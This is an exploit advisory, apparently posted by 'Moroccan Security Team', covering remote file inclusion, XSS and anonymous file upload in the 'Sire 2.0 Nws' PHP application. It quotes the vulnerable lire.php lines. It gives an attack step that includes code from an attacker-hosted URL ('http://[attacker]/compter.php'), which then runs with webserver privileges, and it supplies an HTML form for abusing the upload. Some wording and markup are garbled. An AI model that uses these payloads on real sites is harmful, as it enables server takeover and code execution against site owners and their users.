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Sire 2.0 Nws Remote File inclusion & Arbitary Files Upload

by Moroccan Security Team Geetz To All Freind

[+]File Inclusion:
        Input passed to the "rub" parameter in "lire.php" isn't properly 
        before it is used to include remote files
        Successful exploitation requires that "register_globals" is enabled.
[lire.php code]
        73              if(empty($_GET["rub"])){$rub=rtrim($rubriques[0]);} 
else {$rub=$_GET["rub"];}
        75              include($rub."/compter.php"); ## File Inclusion !!
        298             echo $rub; ## XSS

[+]Exploit: Exploit 
[+]http://[attacker]/compter.php Will be Included And Executed withe the 
privilege of the webserver

File Upload 
Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
[upload.php code:]
if( isset($_POST['upload']) ) // si formulaire soumis
#Upload code ....
Exploit :

<form enctype="multipart/form-data" method="post" 
Download File<br>
<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>

[Moroccan Security Team]
